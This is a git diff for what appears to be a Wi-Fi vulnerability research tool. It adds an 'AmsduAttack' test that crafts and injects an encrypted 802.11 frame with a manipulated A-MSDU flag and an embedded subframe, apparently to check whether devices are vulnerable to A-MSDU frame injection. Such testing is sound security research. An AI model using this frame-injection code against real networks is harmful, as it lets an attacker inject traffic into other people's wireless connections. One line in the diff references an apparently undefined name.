diff --git a/research/fragattack.py b/research/fragattack.py index 7e672b156..8fc47d810 100755 --- a/research/fragattack.py +++ b/research/fragattack.py @@ -8,7 +8,9 @@ from wpaspy import Ctrl from scapy.contrib.wpa_eapol import WPA_key from scapy.arch.common import get_if_raw_hwaddr +# FIXME: Import here to avoid loops from tests_qca import * +from tests_attacks import * # ----------------------------------- Utility Commands ----------------------------------- @@ -1491,6 +1493,9 @@ def prepare_tests(opt): elif opt.testname == "qca-rekey": test = QcaDriverRekey() + elif opt.testname == "amsdu-attack": + test = AmsduAttack(REQ_ICMP, stractions == "linux") + # No valid test ID/name was given else: return None diff --git a/research/libwifi b/research/libwifi index a0bfa1be0..69c617809 160000 --- a/research/libwifi +++ b/research/libwifi @@ -1 +1 @@ -Subproject commit a0bfa1be06d2437f92b75fe08266adae0a145e80 +Subproject commit 69c61780992dc66313e194f97958380ffc110643 diff --git a/research/tests_attacks.py b/research/tests_attacks.py new file mode 100644 index 000000000..394c7b73b --- /dev/null +++ b/research/tests_attacks.py @@ -0,0 +1,38 @@ +from fragattack import * + +class AmsduAttack(Test): + """ + Inject a frame identical to the one the station would receive when performing + the A-MSDU attack by injecting an IP packet with a specific identification field. + """ + + def __init__(self, ptype, linux=False): + super().__init__([Action(Action.Connected, Action.Inject, enc=True)]) + self.ptype = ptype + self.linux = linux + + def prepare(self, station): + log(STATUS, "Generating A-MSDU attack test frame", color="green") + + # Generate the header and payload + header, request, self.check_fn = generate_request(station, self.ptype) + + # This checks if the to-DS is set (frame towards the AP) --- XXX Utility function for this? + if header.FCfield & 1 != 0: + src = station.mac + dst = station.get_peermac() + else: + dst = station.peermac + src = station.bss + + # Put the request inside an IP packet + if not self.linux: + p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="1.2.3.4", id=34)/TCP() + else: + p = header/LLC()/SNAP()/IP(dst="192.168.1.2", src="3.5.1.1")/Raw(b"A" * 768) + p = p/create_msdu_subframe(src, dst, request, last=True) + p[Dot11QoS].Reserved = 1 + + # Schedule transmission of frame + self.actions[0].frame = p +